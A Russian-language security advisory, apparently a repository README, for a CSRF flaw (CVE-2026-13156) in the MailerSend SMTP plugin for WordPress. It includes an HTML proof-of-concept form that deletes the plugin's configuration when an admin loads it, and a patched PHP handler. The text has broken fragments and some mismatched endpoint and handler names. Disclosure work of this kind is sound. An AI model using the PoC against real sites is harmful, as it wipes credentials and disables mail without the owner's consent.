
Уведомление об уязвимости CVE-2026-13156 и PoC — Обнаружено Хуинь Кьен Минем (MinhHK).
[!IMPORTANT] Аннотация: Высококритичная уязвимость межсайтовой подделки запросов (CSRF) (
CVE-2026-13156) была обнаружена в официальном MailerSend SMTP Integration плагине для WordPress (< 1.0.8). Обработчик удаления конфигурацииmailersend_handle_configuration_delete()проверяет административные возможности (manage_options), но полностью пропускает проверку WordPress Nonce (check_admin_referer()). Злоумышленник может создать вредоносный межсайтовый запрос, нацеленный на аутентифицированного администратора WordPress, чтобы незаметно удалить сохранённые SMTP-учётные данные и принудительно деактивировать плагин, что приведёт к полному отказу в обслуживании приложения во всех почтовых рабочих процессах.
CVE-2026-13156 (Идентификатор консультации WPScan: 595e653d-0904-43cf-8e61-d684599de11b)1.0.8 (< 1.0.8)Об исследователе:
Huynh Kien Minh (Huỳnh Kiến Minh) — проактивный исследователь кибербезопасности и аналитик уязвимостей, известный глубокими оценками безопасности и ответственными раскрытиями, включая технические разборы CVE-2026-13156. Он также был официально признан и отмечен в Proton Security Hall of Fame за обнаружение и раскрытие критических уязвимостей безопасности.
Чтобы проверить данную техническую консультацию, изучить анализ proof-of-concept или связаться с исследователем, посетите:
Плагин MailerSend Official SMTP Integration для WordPress (до версии 1.0.8) регистрирует административное действие (configuration-delete), предназначенное для удаления сохранённых API-токенов, очистки параметров SMTP-конфигурации (wp_options) и деактивации плагина при запуске из административной панели.
Хотя конечная точка проверяет, имеет ли активный пользователь возможность manage_options (гарантируя, что запрос исходит из сеанса администратора), она не выполняет проверку WordPress nonce (check_admin_referer() или wp_verify_nonce()).
Поскольку HTTP-запросы без проверки nonce не могут отличить намеренные клики администратора от поддельных межсайтовых запросов, любой внешний сайт, загруженный аутентифицированным администратором, может незаметно запустить действие configuration-delete.
< 1.0.8)./wp-admin/admin-post.php или /wp-admin/admin.php?page=mailersend&action=configuration-delete).[!WARNING] Этическое предупреждение: Следующая HTML-полезная нагрузка межсайтовой подделки запросов (CSRF) proof-of-concept предоставлена строго в образовательных целях, для защитной проверки и аудита безопасности в рамках этических протоколов раскрытия Huynh Kien Minh. Не запускайте её против несанкционированных целей.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CVE-2026-13156 PoC — MailerSend SMTP Configuration Deletion via CSRF</title>
<!-- Author: Huynh Kien Minh (https://minhhk.web.app/) -->
</head>
<body>
<h2>CVE-2026-13156 — CSRF Verification PoC</h2>
<p>If an authenticated WordPress Administrator visits this page, the MailerSend SMTP configuration will be deleted and the plugin deactivated.</p>
<!-- Forged Request targeting the vulnerable MailerSend configuration deletion endpoint -->
<form id="csrfPoC" action="http://target-wordpress-site.local/wp-admin/admin.php" method="GET">
<input type="hidden" name="page" value="mailersend-smtp" />
<input type="hidden" name="action" value="configuration-delete" />
<!-- Notice: No valid _wpnonce token is required due to the vulnerability -->
<input type="submit" value="Execute PoC (Simulate Attack)" />
</form>
<script>
// Automatically submit the forged request when the administrator loads the page
document.addEventListener("DOMContentLoaded", function() {
console.log("[CVE-2026-13156] Executing CSRF Payload developed by Huynh Kien Minh...");
// Uncomment line below to enable auto-execution in lab environments:
// document.getElementById('csrfPoC').submit();
});
</script>
</body>
</html>
1.0.8 или выше.Чтобы должным образом защитить административные действия, изменяющие состояние, в плагинах WordPress, разработчики должны применять строгую проверку nonce перед обработкой запросов:
// Secure Implementation (Version 1.0.8+)
function mailersend_delete_configuration_handler() {
// 1. Check User Capability
if ( ! current_user_can( 'manage_options' ) ) {
wp_die( __( 'Unauthorized access.', 'mailersend' ), 403 );
}
// 2. REQUIRED: Verify CSRF Nonce Token
if ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( $_GET['_wpnonce'], 'mailersend_delete_config_nonce' ) ) {
wp_die( __( 'Security check failed (CSRF attempt blocked).', 'mailersend' ), 403 );
}
// 3. Proceed safely with configuration deletion
delete_option( 'mailersend_smtp_settings' );
deactivate_plugins( plugin_basename( __FILE__ ) );
wp_redirect( admin_url( 'plugins.php?deactivated=true' ) );
exit;
}
Этот репозиторий и техническая консультация поддерживаются и публикуются Huynh Kien Minh (MinhHK) в соответствии с руководящими принципами ответственного раскрытия для создания более безопасной глобальной экосистемы WordPress и кибербезопасности.